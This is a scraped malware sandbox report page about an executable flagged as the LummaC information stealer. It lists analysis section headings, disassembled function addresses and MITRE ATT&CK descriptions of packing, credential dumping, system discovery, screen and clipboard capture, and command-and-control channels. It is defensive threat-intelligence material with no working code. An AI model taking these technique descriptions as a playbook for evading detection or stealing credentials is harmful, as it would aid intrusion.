Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Exlan_setup_v3.1.2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
Exlan_setup_v3.1.2.exe

Function 6CFCB6B0 Relevance: 35.2, APIs: 23, Instructions: 669
COMMON

Function 6CFBB6C0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245
libraryloaderCOMMON

Function 6CFFDBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75
encryptionCOMMON

Function 6CFC2970 Relevance: 25.8, APIs: 17, Instructions: 335
COMMON

Function 6CFBAF30 Relevance: 22.8, APIs: 15, Instructions: 335
COMMON

Function 6CFCD410 Relevance: 22.8, APIs: 15, Instructions: 290
COMMON

Function 6CFC44C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Function 6CFC5140 Relevance: 19.7, APIs: 13, Instructions: 203
COMMON

Function 6CFCBF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Function 6CFC64D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Function 6CFCCB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Function 6CFBA350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Function 6CFCCD20 Relevance: 15.5, APIs: 10, Instructions: 485
COMMON

Function 6CFC66A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Function 6CFC4170 Relevance: 13.8, APIs: 9, Instructions: 277
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre